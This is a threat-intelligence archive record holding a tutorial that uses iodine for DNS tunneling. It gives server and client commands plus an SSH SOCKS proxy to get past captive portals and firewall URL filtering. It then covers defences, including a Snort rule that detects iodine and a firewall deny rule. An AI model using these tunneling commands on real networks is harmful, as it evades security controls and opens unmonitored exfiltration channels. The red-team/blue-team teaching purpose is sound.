{
	"id": "6461230b-4449-48d8-80cf-ce77af8fd698",
	"created_at": "2026-04-29T08:21:23.022172Z",
	"updated_at": "2026-04-29T10:41:48.969854Z",
	"deleted_at": null,
	"sha1_hash": "45da1e76cf14f74596bf5f28dbeefd94ffc87d03",
	"title": "Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3761540,
	"plain_text": "Learn how easy is to bypass firewalls using DNS tunneling (and\r\nalso how to block it)\r\nBy Roger Galobardes\r\nPublished: 2023-01-01 · Archived: 2026-04-29 07:20:49 UTC\r\n9 min read\r\nOct 30, 2018\r\nSee how I played red team/blue team on this simple network security experiment.\r\nPress enter or click to view image in full size\r\nphoto by Rob Bye on Unsplash\r\nMany tutorials out there explain how to perform DNS tunneling but most of them feel like just a compilation of\r\nthe commands needed to execute it, with almost no explanation on the networking background.\r\nWhat’s even worse: No one seems to discuss how to prevent DNS tunneling from happening in your network.\r\n1. What is it and why would someone use it:\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 1 of 14\n\nDNS tunneling is a method used to send data over the DNS protocol, a protocol which has never been intended for\r\ndata transfer. Because of that, people tend to overlook it and it has become a popular but effective tool in many\r\nattacks.\r\nMost popular use case for DNS tunneling is obtaining free internet through bypassing captive portals at airports,\r\nhotels, or if you feel patient the not-so-cheap in flight Wi-Fi.\r\nPress enter or click to view image in full size\r\nHotels generally provide an access code if you ask… but we all have introvert days.\r\nOn those shared internet hotspots HTTP traffic is blocked until a username/password is provided, however DNS\r\ntraffic is generally still allowed in the background: we can encode our HTTP traffic over DNS and voilà, we have\r\ninternet access.\r\nThis sounds fun but reality is, browsing anything on DNS tunneling is slow. Like, back to 1998 slow.\r\nAnother more dangerous use of DNS tunneling would be bypassing network security devices (Firewalls, DLP\r\nappliances…) to set up a direct and unmonitored communications channel on an organisation’s network.\r\nPossibilities here are endless: Data exfiltration, setting up another penetration testing tool… you name it.\r\nTo make it even more worrying, there’s a large amount of easy to use DNS tunneling tools out there.\r\nThere’s even at least one VPN over DNS provider (warning: the design of the website is hideous, making me\r\ndoubt on the legitimacy of it).\r\nAs a pentester all this is great, as a network admin not so much.\r\n2. How does it work:\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 2 of 14\n\nFor those who know nothing about DNS but still made it here, I think you deserve a very brief explanation on\r\nwhat DNS does: DNS is like a phonebook for the internet, it translates URLs (human-friendly language, the\r\nperson’s name), into an IP address (machine-friendly language, the phone number). That helps us remember many\r\nwebsites, same as we can remember many people’s names.\r\nFor those who know what DNS is I would suggest looking here for a quick refresh on DNS, but in short what you\r\nneed to know is:\r\nA Record: Maps a domain name to an IP address.\r\nexample.com → 12.34.52.67\r\nNS Record (a.k.a. Nameserver record): Maps a domain name to a list of DNS servers, in case our website\r\nis hosted in multiple servers.\r\nexample.com → server1.example.com, server2.example.com\r\nWho is involved in DNS tunneling?\r\nClient. Will launch DNS requests with data in them to a domain.\r\nOne Domain that we can configure. So DNS servers will redirect its requests to a defined server of our\r\nown.\r\nServer. This is the defined nameserver which will ultimately receive the DNS requests.\r\nThe 6 Steps in DNS tunneling (simplified):\r\nPress enter or click to view image in full size\r\nI should have been an artist but I just loved subnetting too much.\r\n1. The client encodes data in a DNS request. The way it does this is by prepending a piece of data in the\r\ndomain of the request. For example: mypieceofdata.server1.example.com\r\n2. The DNS request goes out to a DNS server.\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 3 of 14\n\n3. The DNS server finds out the A register of your domain with the IP address of your server.\r\n4. The request for mypieceofdata.server1.example.com is forwarded to the server.\r\n5. The server processes whatever the mypieceofdata was supposed to do. Let’s assume it was an HTTP\r\nrequest.\r\n6. The server replies back over DNS and woop woop, we’ve got signal.\r\nAs you can imagine with this setup the key to having a fast internet connection is low latency, and when most\r\nairlines provide internet connections with around 1 second of ping, you might spend the whole 17 hours 40\r\nminutes between Auckland and Doha to load this article.\r\n3. Step by step example using iodine:\r\nFor this example we will use the famous tool iodine. From their website, the name came from this:\r\nThe name iodine was chosen since it starts with IOD (IP Over DNS) and since iodine has atomic number 53,\r\nwhich happens to be the DNS port number.\r\n1. Checklist before you start — What you need:\r\nA domain that you can configure. Godaddy allows this for their cheap .xyz domains.\r\nA device that acts as a server which has a public IP address and if you have it behind a firewall, make sure\r\nit is reachable through UDP 53. For this example I am using an old Raspberry Pi but you can run iodine on\r\na plethora of devices. (If you’re reading a specific article like this I assume you know how to run linux on a\r\nRaspberry and how to install iodine!).\r\nA client with iodine installed. For this I will use my Kali VM but again, you can even run iodine on\r\nWindows if you want.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 4 of 14\n\nIt can do more than emulating Street Fighter 2 turbo apparently.\r\n2. Register a domain on GoDaddy and configure it like this:\r\nA record called dnsa.exampledomain.xyz → your public IP address\r\nNS record called t.exampledomain.xyz → dnsa.exampledomain.xyz\r\n→ Protip: Having a short subdomain name like “t” will allow you to pack in more data in every single request.\r\nYou can do this with a dynamic IP but you will need to use Dynamid DNS provider and point the NS record to it.\r\n3. Wait for it to propagate.\r\nThis could go from 1 to 24 hours.\r\n4. Run iodine on your server:\r\n$ sudo iodined -c -f 10.0.0.1 -P password t.exampledomain.xyz\r\n…If you copy paste that password you deserve whatever happens due to it.\r\n5. Verify that it works:\r\nAt this point you can verify your DNS setup on the following tool from the iodine team:\r\nhttps://code.kryo.se/iodine/check-it/\r\nIodine must be running on the server and be reachable from the internet!\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 5 of 14\n\nIf you’re in the right path you should see this message.\r\nIt is also a good moment to check what is your client’s public IP address and note it down, that will help verify\r\nlater that DNS tunneling works.\r\nPress enter or click to view image in full size\r\nIt is important to use tools that make you look professional.\r\n6. Run iodine on the client and establish the DNS tunnel:\r\nGet Roger Galobardes’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nOn the client:\r\nroot@kali:~#iodine -I 50 -f -P password t.exampledomain.xyz.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 6 of 14\n\niodine tries many encoding methods to see which is more suitable.\r\nA new network interface should appear in your client, and you should be able to ping the server’s tunnel IP\r\naddress we configured before.\r\nPress enter or click to view image in full size\r\ndns0 will now appear under your client’s network interfaces\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 7 of 14\n\nYou should be able to ping the server, even SSH into it. All through your fresh DNS tunnel.\r\nNow, at this point you could set up a route for your traffic to be sent to 10.0.0.1 and you’d be good to go.\r\nHowever DNS traffic is not encrypted so an extra step we can take is…\r\n7. Establish an SSH tunnel over the DNS tunnel:\r\nOn the client establish an SSH tunnel against the server:\r\nssh -D 8080-N 10.0.0.1\r\n-N makes it not execute a remote command, -D creates a socket to listen on this port and whenever a connection is\r\ndone to it it forwards traffic over the SSH tunnel.\r\n8. Change proxy settings accordingly on your browser:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 8 of 14\n\n9. Enjoy your slow, yet free, internet access.\r\nGood way to test it is checking that your public IP address on the client is now the same as on the server…\r\nCongratulations!\r\n4. Blocking DNS tunneling on your network (with an example!):\r\nNow this is the bit where I’ve struggled to find more information on.\r\nThere’s many approaches you can follow to block DNS tunneling, which one to choose will depend on your\r\ncurrent deployment:\r\n1. Detection of known malicious domains:\r\nThis is done by analyzing the DNS queries from your network and if one of them is for a known bad domain, it is\r\ndropped.\r\nThe easiest way to implement this is by using a public DNS resolver that provides a layer of security. Free\r\nexamples of this are Cloudfare (just check you’re not using 1.1.1.1 in your network…), or OpenDNS (free for\r\nhome use). Enterprise solutions include some of the Infoblox products or Cisco Umbrella to name the most\r\ncommon ones.\r\nAlternatively some firewalls provide URL security and might be able to block known domains.\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 9 of 14\n\nFor this method you are relying on a blacklist of known malicious domains, so if you are victim of a targeted or\r\nsmall scale attack, chances are this is going to be useless.\r\n2. Traffic Analysis:\r\nMore of a reactive measure, however if we have an idea of the average DNS requests in your network or hosts you\r\nshould be able to detect when there is a sudden increase in DNS activity.\r\nAgain, there are many tools you can use for this. From firewalls that have application visibility (most NGFW\r\nshould do this), network flow analysis tools, or dedicated DNS security appliances like the ones from Infoblox.\r\n3. Intrusion Prevention Systems:\r\nSome IPS systems such as Snort will include detect packets unique to iodine:\r\n# alert udp $EXTERNAL_NET 53 -\u003e $HOME_NET any (msg:”APP-DETECT iodine dns tunnelling\r\nhandshake server ACK”; flow:to_client; byte_test:1,\u0026,0x80,2; content:”|00 01 00 01 00|”; depth:5;\r\noffset:4; content:”v”; within:1; distance:4; content:”VACK”; within:200; fast_pattern;\r\nmetadata:service dns; reference:url,code.kryo.se/iodine/README.html; classtype:policy-violation;\r\nsid:27046; rev:2;)\r\nSome other more generic rules will detect long URLs in DNS requests, these rules that can easily be bypassed\r\nby shortening the payload in every request (although slowing down the tunnel speed).\r\nBlocking DNS Tunnel — An example:\r\nDuring my Iodine deployment I was sending all traffic through a Palo Alto Networks firewall in my environment.\r\nThe plan was to play first the attacker role and later the defender.\r\nFirst I configured a basic URL filtering rule to block social network websites:\r\nPress enter or click to view image in full size\r\nI blocked social networking sites on the URL filtering engine and soon I was browsing them again.\r\nIn seconds I established my DNS tunnel… and it worked! Soon I was loading Facebook.\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 10 of 14\n\nI was surprised on how easy it was to bypass the URL filtering engine, and then I proceeded to switch teams and\r\nsee how could I block this.\r\nThe starting point would be traffic analysis, I expected a big amount of DNS traffic and then some convoluted\r\nsolution to block sudden changes in traffic patterns.\r\nHowever this is what I found to my surprise:\r\nPress enter or click to view image in full size\r\nBasic application usage analysis on a Palo Alto Networks firewall\r\nThe firewall was detecting that I was sending TCP traffic over DNS. But how?\r\nClicking on the application details I could see the following:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 11 of 14\n\nIt looks like the application detection engine detects traffic from most DNS tunneling tools, in a similar way as we\r\nsaw that Snort has a couple of rules to detect Iodine traffic, and puts them under the same category.\r\nGrouping all these types of apps into one application group makes it more easy to manage than having a single\r\nSnort alert.\r\nLet’s create a rule now that will block these type of applications:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 12 of 14\n\nFirst I create an Application Filter for Evasive apps with a high risk rating. Notice tcp-over-dns is in\r\nthe list.\r\nPress enter or click to view image in full size\r\nSecond I define that this will be for traffic sourced from inside my network.\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 13 of 14\n\nAnd finally, we make the rule Deny all this traffic. Check this article to see what is the difference\r\nbetween a Deny or a Drop.\r\nEasy! Let’s see if it works:\r\nFirst we run Iodine…\r\n.. and apparently iodine can’t establish a tunnel anymore!\r\nJob’s done! Our network should now be secured against most DNS tunneling attacks.\r\nTo simulate a true real world scenario I should switch sides again and try to bypass again this firewall but being\r\nhonest, that would be way more complex.\r\nAnything you didn’t like? Please tell me why!\r\nSource: https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nhttps://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000"
	],
	"report_names": [
		"learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-29T10:39:53.338149Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1777450883,
	"ts_updated_at": 1777459308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/45da1e76cf14f74596bf5f28dbeefd94ffc87d03.pdf",
		"text": "https://archive.orkl.eu/45da1e76cf14f74596bf5f28dbeefd94ffc87d03.txt",
		"img": "https://archive.orkl.eu/45da1e76cf14f74596bf5f28dbeefd94ffc87d03.jpg"
	}
}